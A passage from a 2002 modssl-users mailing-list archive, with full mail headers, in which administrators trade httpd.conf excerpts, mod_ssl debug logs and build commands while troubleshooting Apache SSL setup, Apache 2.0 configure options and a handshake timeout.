172.16.1.206)[07/Apr/2002 15:20:15 26027] [info] Seeding PRNG with 23177 bytes of entropy[07/Apr/2002 15:20:15 26027] [info] Connection: Client IP: 172.16.1.206, Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)[07/Apr/2002 15:20:15 26027] [info] Initial (No.1) HTTPS request received for child 2 (server telebanking.hbl.ch:5100)[07/Apr/2002 15:20:15 26027] [info] Connection to child 2 closed with unclean shutdown (server telebanking.hbl.ch:5100, client 172.16.1.206) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 12:27:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA17654; Mon, 8 Apr 2002 12:26:32 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from services.teiath.gr id MAA17634; Mon, 8 Apr 2002 12:25:46 +0200 (MET DST) From: support@cs.teiath.gr Received: (from nobody@localhost) by services.teiath.gr (8.11.0/8.11.0) id g38ATt015177 for modssl-users@modssl.org; Mon, 8 Apr 2002 13:29:55 +0300 X-Authentication-Warning: services.teiath.gr: nobody set sender to support@cs.teiath.gr using -f Received: from 195.130.109.71 ( [195.130.109.71]) as user support@kde.cs.teiath.gr by webmail.teiath.gr with HTTP; Mon, 8 Apr 2002 13:29:55 +0300 Message-ID: <1018261795.3cb171231b0d2@webmail.teiath.gr> Date: Mon, 8 Apr 2002 13:29:55 +0300 To: modssl-users@modssl.org Subject: Problem starting apache with ssl mod_ssl MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-7 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 2.3.7-cvs X-Originating-IP: 195.130.109.71 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: support@cs.teiath.gr X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users greetings to everyone i have the following problem and it will be very nice of you if you could help me out with this! in one redhat7.2 i have installed apache/php/ssl/mod_ssl as it can be seen at the end of my mail In the httpd.conf i have put the following: ***httpd.conf*** ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 12:50:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA18552; Mon, 8 Apr 2002 12:49:33 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from services.teiath.gr id MAA18527; Mon, 8 Apr 2002 12:48:46 +0200 (MET DST) From: support@cs.teiath.gr Received: (from nobody@localhost) by services.teiath.gr (8.11.0/8.11.0) id g38AqND15254 for modssl-users@modssl.org; Mon, 8 Apr 2002 13:52:23 +0300 X-Authentication-Warning: services.teiath.gr: nobody set sender to support@cs.teiath.gr using -f Received: from 195.130.109.71 ( [195.130.109.71]) as user support@kde.cs.teiath.gr by webmail.teiath.gr with HTTP; Mon, 8 Apr 2002 13:52:23 +0300 Message-ID: <1018263143.3cb176675a872@webmail.teiath.gr> Date: Mon, 8 Apr 2002 13:52:23 +0300 To: modssl-users@modssl.org Subject: Problem starting apache with ssl mod_ssl MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-7 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 2.3.7-cvs X-Originating-IP: 195.130.109.71 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: support@cs.teiath.gr X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sory with the first attempt samthing went wrong greetings to everyone i have the following problem and it will be very nice of you if you could help me out with this! in one redhat7.2 i have installed apache/php/ssl/mod_ssl as it can be seen at the end of my mail In the httpd.conf i have put the following: *httpd.conf* Listen 80 Listen 599 DocumentRoot "/usr/local/apache/htdocs" ServerName asterix.cs.teiath.gr ServerAdmin xxxt@asterix.cs.teiath.gr ErrorLog /usr/local/apache/logs/asterix_SSL_error_log TransferLog /usr/local/apache/logs/asterix_SSL_access_log SSLEngine on SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLCertificateFile /usr/local/apache/conf/keys/asterix.cs.teiath.gr/server.crt SSLCertificateKeyFile /usr/local/apache/conf/keys/asterix.cs.teiath.gr/server.key SSLOptions +StdEnvVars SSLOptions +StdEnvVars SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 CustomLog /usr/local/apache/logs/ssl_request_log \ "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" when i run /usr/local/apache/bin/apactrl startssl in the error.log are written the following: *log from error.log* [Mon Apr 8 03:59:26 2002] [notice] Apache/1.3.24 (Unix) PHP/4.1.2 mod_gzip/1.3.19.1a DAV/1.0.3 mod_ssl/2.8.8 OpenSSL/0.9.6b configured -- resuming normal operations [Mon Apr 8 03:59:26 2002] [notice] suEXEC mechanism enabled (wrapper: /usr/local/apache/bin/sue xec) [Mon Apr 8 03:59:26 2002] [notice] Accept mutex: sysvsem (Default: sysvsem) and in the ssl_engine_log the following: *log from ssl_engine_log* [08/Apr/2002 04:15:35 29986] [info] Server: Apache/1.3.24, Interface: mod_ssl/2.8.8, Library: OpenSSL/0.9.6b [08/Apr/2002 04:15:35 29986] [info] Init: 1st startup round (still not detached) [08/Apr/2002 04:15:35 29986] [info] Init: Initializing OpenSSL library [08/Apr/2002 04:15:35 29986] [info] Init: Loading certificate & private key of SSL-aware server asterix.cs.teiath.gr:599 [08/Apr/2002 04:15:35 29986] [info] Init: Requesting pass phrase via builtin terminal dialog [08/Apr/2002 04:15:39 29986] [info] Init: Wiped out the queried pass phrases from memory [08/Apr/2002 04:15:39 29986] [info] Init: Seeding PRNG with 136 bytes of entropy [08/Apr/2002 04:15:39 29986] [info] Init: Generating temporary RSA private keys (512/1024 bits) [08/Apr/2002 04:15:41 29986] [info] Init: Configuring temporary DH parameters (512/1024 bits) [08/Apr/2002 04:15:41 29987] [info] Init: 2nd startup round (already detached) [08/Apr/2002 04:15:41 29987] [info] Init: Reinitializing OpenSSL library [08/Apr/2002 04:15:41 29987] [info] Init: Seeding PRNG with 136 bytes of entropy [08/Apr/2002 04:15:41 29987] [info] Init: Configuring temporary RSA private keys (512/1024 bits) [08/Apr/2002 04:15:41 29987] [info] Init: Configuring temporary DH parameters (512/1024 bits) [08/Apr/2002 04:15:41 29987] [info] Init: Initializing (virtual) servers for SSL [08/Apr/2002 04:15:41 29987] [info] Init: Configuring server asterix.cs.teiath.gr:599 for SSL protocol when now i try through a browser https://asterix.cs.teiath.gr:599 nothing is happening i receive from netscape "server not response" then i try the following curl https://asterix.cs.teiath.gr:599 and it produces in the ssl_engine_log the following [08/Apr/2002 04:36:36 29988] [info] Connection to child 0 established (server asterix.cs.teiath.gr:599, client 195.130.109.84) [08/Apr/2002 04:36:36 29988] [info] Seeding PRNG with 23177 bytes of entropy [08/Apr/2002 04:36:37 29988] [info] Connection: Client IP: 195.130.109.84, Protocol: TLSv1, Cipher: EDH-RSA-DES-CBC3-SHA (168/168 bits) [08/Apr/2002 04:36:37 29988] [info] Initial (No.1) HTTPS request received for child 0 (server asterix.cs.teiath.gr:599) [08/Apr/2002 04:36:37 29988] [info] Connection to child 0 closed with standard shutdown (server asterix.cs.teiath.gr:599, client 195.130.109.84) that it means to me,if i get it right, that it works when i trythe same curl https://asterix.cs.teiath.gr:599 from a different machine i receive curl: (7) connect() failed have you any idea what might be wrong? i apologise for my huge mail and i thank you for your time. Apostolis PS APACHE AND PHP CONFIG PHP config '--enable-exif' '--enable-track-vars' '--with-calendar=shared' '--enable-safe-mode' '--enable-magic-quotes' '--enable-trans-sid' '--enable-wddx' '--enable-ftp' '--with-gd=/usr/local' '--with-zlib' '--enable-gd-native-tt' '--with-t1lib=/usr/local' '--with-jpeg-dir=/usr' '--with-png-dir=/usr' '--with-zlib-dir=/usr' '--with-ttf' '--with-freetype-dir=/usr/local' '--with-imap=/usr/local' '--with-mhash=/usr/local' '--with-mcrypt=/usr/local' '--with-unixodbc=/usr/local/unixODBC' '--with-snmp=/usr/local/snmp' '--with-openssl=/usr' '--with-gettext=/usr' '--with-mysql=/usr' '--with-pgsql' '--with-ldap' '--with-mm' '--with-mcal=/usr/local/libmcal' '--with-db3=/usr' APACHE MODULES mod_php4, mod_gzip, mod_dav, mod_auth_ldap, mod_ssl, mod_setenvif, mod_so, mod_headers, mod_digest, mod_auth_dbm, mod_auth, mod_access, mod_rewrite, mod_alias, mod_userdir, mod_speling, mod_actions, mod_imap, mod_asis, mod_cgi, mod_dir, mod_autoindex, mod_include, mod_status, mod_negotiation, mod_mime, mod_log_referer, mod_log_agent, mod_log_config, mod_env, mod_vhost_alias, mod_mmap_static, http_core ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 12:54:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA18713; Mon, 8 Apr 2002 12:53:37 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from dukas.upc.es id MAA18676; Mon, 8 Apr 2002 12:52:26 +0200 (MET DST) Received: from parra.upc.es (parra.upc.es [147.83.36.80]) by dukas.upc.es (8.12.1/8.12.1) with ESMTP id g38AqJgi006778 for ; Mon, 8 Apr 2002 12:52:20 +0200 (MET DST) Received: from localhost (localhost [127.0.0.1]) by parra.upc.es (Postfix) with ESMTP id F225261A1F for ; Mon, 8 Apr 2002 12:52:12 +0200 (MET DST) Received: from etsetb.upc.es (dalia.upc.es [147.83.36.36]) by parra.upc.es (Postfix) with ESMTP id 789DD61A1A for ; Mon, 8 Apr 2002 12:51:59 +0200 (MET DST) Message-ID: <3CB1680F.3BCBD3E9@etsetb.upc.es> Date: Mon, 08 Apr 2002 11:51:11 +0200 From: Sergi Mayordomo X-Mailer: Mozilla 4.78 [es] (X11; U; Linux 2.4.7-10 i586) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Problem starting apache with ssl mod_ssl References: <1018261795.3cb171231b0d2@webmail.teiath.gr> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Scanned: by AMaViS perl-10 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Sergi Mayordomo X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users support@cs.teiath.gr escribió: > > greetings to everyone > > i have the following problem and it will be very nice of you if you could help me out with this! > in one redhat7.2 i have installed apache/php/ssl/mod_ssl as it can be seen at the end of my mail > In the httpd.conf i have put the following: > > ***httpd.conf*** > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org Hi, I can't watch your file. Please, tell me one thing, is your apache instaled with rpm? and if it is, don't you have seen this [warn] Loaded DSO /etc/httpd/modules/mod_caucho.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) ?? How can i solve this problem with RPMS ? ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 13:29:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA20335; Mon, 8 Apr 2002 13:28:15 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from trivadis.com id NAA20315; Mon, 8 Apr 2002 13:28:02 +0200 (MET DST) Received: from localhost.localdomain ([127.0.0.1] helo=lttit) by trivadis.com with smtp (Exim 3.34 #43) id 16uXJ6-0000dy-00 for modssl-users@modssl.org; Mon, 08 Apr 2002 13:27:32 +0200 Date: Mon, 8 Apr 2002 13:27:31 +0200 From: Tim Tassonis To: modssl-users@modssl.org Subject: Error Page for Client Authentication Failure X-Mailer: Sylpheed version 0.7.4cvs21 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Tim Tassonis X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Is there a possibility in mod_ssl to define an Error Page for the case when a required Client Autentication fails? I haven't come across anything appropriate in the documentation, however I thought there really should be something like this. Bye Tim ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 20:49:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA11336; Mon, 8 Apr 2002 20:48:29 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from irvexch1.rainbow.com id UAA11291; Mon, 8 Apr 2002 20:47:16 +0200 (MET DST) Message-ID: <5606C687D4C7D5119A5800508BF30DB401C04317@mail.rainbow.com> From: Lynn Gazis To: "'modssl-users@modssl.org'" Subject: RE: Apache 2.0.* and SSL Date: Mon, 8 Apr 2002 11:49:37 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-8" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Lynn Gazis X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users What options are needed to "configure," with Apache 2.0, to make sure that mod_ssl is enabled, and that a particular OpenSSL directory is used? I tried guessing at the right options, but a look at the httpd.conf file in the resulting installation suggests that I guessed wrong. Lynn Gazis ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 21:20:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA13126; Mon, 8 Apr 2002 21:19:23 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id VAA13089; Mon, 8 Apr 2002 21:18:32 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g38JHnf16434 for ; Mon, 8 Apr 2002 15:17:49 -0400 Date: Mon, 8 Apr 2002 15:17:49 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: POST / SSL / Client Certificates Problem In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, 7 Apr 2002 modssl.com@robot.hey.nu wrote: > I'm using Apache 2 beta, mod_ssl (obviously), and a few self-signed > client certificates. My problem is that when I try to POST to a .cgi > file, I get the following error: "Method not allowed! The POST method is > not allowed for the requested URL." This is a known issue with mod_ssl for Apache 2.0... it's on the modules/ssl/TODO list. Thanks, Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 21:20:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA13136; Mon, 8 Apr 2002 21:19:42 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.hiwaay.net id VAA13072; Mon, 8 Apr 2002 21:18:08 +0200 (MET DST) Received: from mail.hiwaay.net (localhost [127.0.0.1]) by mail.hiwaay.net (8.12.2/8.12.2) with ESMTP id g38JI0Yd364002 for ; Mon, 8 Apr 2002 14:18:01 -0500 (CDT) Received: (from caulds@localhost) by mail.hiwaay.net (8.12.2/8.12.2/flySubmit) id g38JHx9w336752 for modssl-users@modssl.org; Mon, 8 Apr 2002 14:17:59 -0500 (CDT) Date: Mon, 8 Apr 2002 14:17:59 -0500 From: Charles Aulds To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL Message-ID: <20020408141759.A251701@fly.hiwaay.net> References: <5606C687D4C7D5119A5800508BF30DB401C04317@mail.rainbow.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <5606C687D4C7D5119A5800508BF30DB401C04317@mail.rainbow.com>; from lgazis@rainbow.com on Mon, Apr 08, 2002 at 11:49:37AM -0700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Charles Aulds X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > What options are needed to "configure," with Apache 2.0, to make sure that > mod_ssl is enabled, and that a particular OpenSSL directory is used? I > tried guessing at the right options, but a look at the httpd.conf file in > the resulting installation suggests that I guessed wrong. > This is what I use: ./configure \ "--with-layout=Apache" \ "--enable-mods-shared=all" \ "--enable-ssl" ( Apache/2.0.35 (Unix) mod_ssl/2.0.35 OpenSSL/0.9.6b DAV/2 mod_perl/1.99_01-dev Perl/v5.6.0 PHP/4.1.2 ) __ Charles Aulds http://hiwaay.net/~caulds/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 21:25:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA13411; Mon, 8 Apr 2002 21:24:22 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from imo-m05.mx.aol.com id VAA13398; Mon, 8 Apr 2002 21:23:54 +0200 (MET DST) Received: from gjmwalsh@netscape.net by imo-m05.mx.aol.com (mail_out_v32.5.) id m.af.2490873 (22681) for ; Mon, 8 Apr 2002 15:23:10 -0400 (EDT) Received: from netscape.com (mow-m24.webmail.aol.com [64.12.137.1]) by air-in04.mx.aol.com (v84.14) with ESMTP id MAILININ42-0408152310; Mon, 08 Apr 2002 15:23:10 -0500 Date: Mon, 08 Apr 2002 15:23:10 -0400 From: gjmwalsh@netscape.net (George Walsh) To: modssl-users@modssl.org Subject: RE: RE: Apache 2.0.* and SSL Message-ID: <338A5CD1.7DC0B4E7.009AA07D@netscape.net> X-Mailer: Atlas Mailer 2.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: gjmwalsh@netscape.net (George Walsh) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users OpenSSL is a separate issue, really. It is normally found in /usr/local/src. I am using 0.9.6c currently, which I download as a tar.gz to my /usr/local/src file, uncompress it with: gzip -dc openssl-0.9.6c.tar.gz | tar xf - cd /usr/local/src/openssl-0.9.6c ./config shared make all test install ... and voila! Apache 2.0 includes its own mod_ssl as part of the 'new look'. That gives you encryption while openssl gives you certification services. FWIW I prefer to remove rpm installations for Apache, mod_ssl, mozilla, netscape, opera and sendmail so I can keep painlessly up-to-date. Its not everybody's cup of tea, but I've been doing it this way for years and I like the feeling of being 'in control' of these crucial elements. Hope that helps ... George >What options are needed to "configure," with Apache 2.0, to make sure that >mod_ssl is enabled, and that a particular OpenSSL directory is used? I >tried guessing at the right options, but a look at the httpd.conf file in >the resulting installation suggests that I guessed wrong. > >Lynn Gazis >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > -- George Walsh, Managing Director, CruiseRoutes Division, DSC Directional Services Corp Courtenay, British Columbia, Canada __________________________________________________________________ Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/ Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 22:29:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA16197; Mon, 8 Apr 2002 22:28:23 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ip9.elmar.co.il id WAA16167; Mon, 8 Apr 2002 22:27:33 +0200 (MET DST) Received: from netmask.it (ip9.elmar.co.il [192.168.1.9]) by ip9.elmar.co.il (8.11.6/8.11.6) with ESMTP id g38KQWr28185 for ; Mon, 8 Apr 2002 23:26:33 +0300 Message-ID: <3CB1FCF8.2C169550@netmask.it> Date: Mon, 08 Apr 2002 23:26:32 +0300 From: Eli Marmor Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.4.8-26mdk i686) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL References: <5606C687D4C7D5119A5800508BF30DB401C04317@mail.rainbow.com> <20020408141759.A251701@fly.hiwaay.net> Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eli Marmor X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users By the way: I think that we should open a special mailing list for mod_ssl of Apache2. The current list focuses on 1.3, which is completely different than 2, and even comes in a very different way (as a patch, rather than a filter). The developers and maintainers are different. And the new mod_ssl is a part of Apache. On the other hand, the main list that currently deals with the new mod_ssl, is new_httpd, which is the main list of Apache developers: It deals with zillion things, very heavy, and doesn't focus on SSL at all. There must be a third list, specific for mod_ssl of 2.0. It must be announced to both of the current lists, so subscribers of both have chance to subscribe to the new list (I guess that in most of the cases it will be IN ADDITION to their current list, and not instead of it). I don't know if it should be served by the server of the other lists of Apache, or by Ralf's server; I guess that we should ask Ralf... -- Eli Marmor marmor@netmask.it CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: +972-9-766-1020 8 Yad-Harutzim St. Fax.: +972-9-766-1314 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 22:36:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA16458; Mon, 8 Apr 2002 22:35:21 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id WAA16450; Mon, 8 Apr 2002 22:34:55 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g38KYCK16572 for ; Mon, 8 Apr 2002 16:34:13 -0400 Date: Mon, 8 Apr 2002 16:34:12 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL In-Reply-To: <3CB1FCF8.2C169550@netmask.it> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, 8 Apr 2002, Eli Marmor wrote: > I think that we should open a special mailing list for mod_ssl of > Apache2. My personal opinion would be that most modssl users' questions will be of the same nature regardless of version. The kinds of questions we get here: (1) why can't I use NBVH+SSL? (2) how do I get my certificate created and/or to work (3) I'm having problems getting IE to connect, what do I do? (4) ... The answers to these questions are all the same regardless of whether you're talking about 1.3 or 2.0, and there will always be those of us on the httpd development team that listen in on modssl-users for potential bugs, so in my mind it makes sense to keep the user group as one. But that's just me... if you guys disagree, then go right ahead and create a new list. --Cliff -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 22:38:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA16575; Mon, 8 Apr 2002 22:37:27 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from DB.Stanford.EDU id WAA16529; Mon, 8 Apr 2002 22:36:43 +0200 (MET DST) Received: from db.stanford.edu (Blenny.Stanford.EDU [171.64.75.55]) by DB.Stanford.EDU (8.9.3/8.8.8) with ESMTP id NAA01570 for ; Mon, 8 Apr 2002 13:30:58 -0700 Message-ID: <3CB1FF58.52D9E170@db.stanford.edu> Date: Mon, 08 Apr 2002 13:36:40 -0700 From: Gary W X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.16-22enterprise i686) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Apache/OpenSSL Handshake timeout References: <5606C687D4C7D5119A5800508BF30DB401C04317@mail.rainbow.com> <20020408141759.A251701@fly.hiwaay.net> <3CB1FCF8.2C169550@netmask.it> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Gary W X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am getting a timeout error, from not reading all the bytes from the client(?). The client can talk to retrieve the jar file, but when it sends an RMI, it balks. I obviously have 8443 open for SSL, and my certs must be OK. Is it a client problem? Is it even related to mod_ssl (someone in the openssl list said to post it here)? On Solaris 2.6 server: Server: Apache/1.3.14, Interface: mod_ssl/2.7.1, Library: OpenSSL/0.9.6 (this is the jar download - it works over port 8443) [04/Apr/2002 09:01:00 29031] [info] Connection to child 0 established (server x:8443, client x) [04/Apr/2002 09:01:01 29031] [info] Seeding PRNG with 1160 bytes of entropy [04/Apr/2002 09:01:01 29031] [trace] OpenSSL: Handshake: start [04/Apr/2002 09:01:02 29031] [trace] OpenSSL: Loop: before/accept initialization [04/Apr/2002 09:01:02 29031] [debug] OpenSSL: read 11/11 bytes from BIO#0021FE88 [mem: 00234C20] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 80 46 01 03 00 00 2d 00-00 00 10 .F....-.... | +-------------------------------------------------------------------------+ [04/Apr/2002 09:01:02 29031] [debug] OpenSSL: read 61/61 bytes from BIO#0021FE88 [mem: 00234C2B] (BIO dump follows) +-------------------------------------------------------------------------+ ... +-------------------------------------------------------------------------+ [04/Apr/2002 09:01:02 29031] [trace] OpenSSL: Loop: SSLv3 read client hello A [04/Apr/2002 09:01:02 29031] [trace] OpenSSL: Loop: SSLv3 write server hello A [04/Apr/2002 09:01:03 29031] [trace] OpenSSL: Loop: SSLv3 write certificate A [04/Apr/2002 09:01:03 29031] [trace] OpenSSL: Loop: SSLv3 write server done A [04/Apr/2002 09:01:03 29031] [debug] OpenSSL: write 937/937 bytes to BIO#0021FE88 [mem: 00242048] (BIO dump follows) +-------------------------------------------------------------------------+ ... [04/Apr/2002 09:01:40 29031] [debug] OpenSSL: write 23/23 bytes to BIO#0021FE88 [mem: 0023D430] (BIO dump follows) +-------------------------------------------------------------------------+ ... +-------------------------------------------------------------------------+ [04/Apr/2002 09:01:40 29031] [trace] OpenSSL: Write: SSL negotiation finished successfully [04/Apr/2002 09:01:40 29031] [info] Connection to child 0 closed with standard shutdown (server x:8443, client x) (this RMI call fails) [03/Apr/2002 08:11:48 29033] [info] Connection to child 2 established (server :8443, client ) [03/Apr/2002 08:11:48 29033] [info] Seeding PRNG with 1160 bytes of entropy [03/Apr/2002 08:11:48 29033] [trace] OpenSSL: Handshake: start [03/Apr/2002 08:11:48 29033] [trace] OpenSSL: Loop: before/accept initialization [03/Apr/2002 08:11:48 29033] [debug] OpenSSL: read 7/11 bytes from BIO#00242AA8 [mem: 00237C38] (BIO dump follows) +-------------------------------------------------------------------------+ | 0000: 4a 52 4d 49 00 02 4b JRMI..K | +-------------------------------------------------------------------------+ [03/Apr/2002 08:12:10 29033] [debug] OpenSSL: I/O error, 4 bytes expected to read on BIO#00242AA8 [mem: 00237C3F] [03/Apr/2002 08:12:10 29033] [trace] OpenSSL: Exit: error in SSLv2/v3 read client hello A [03/Apr/2002 08:12:10 29033] [error] SSL handshake timed out (client 171.64.70.217, server Gary Wesley ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Apr 8 23:35:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA19075; Mon, 8 Apr 2002 23:35:04 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from imo-r02.mx.aol.com id XAA19010; Mon, 8 Apr 2002 23:33:53 +0200 (MET DST) Received: from gjmwalsh@netscape.net by imo-r02.mx.aol.com (mail_out_v32.5.) id m.5.37641f1 (16228) for ; Mon, 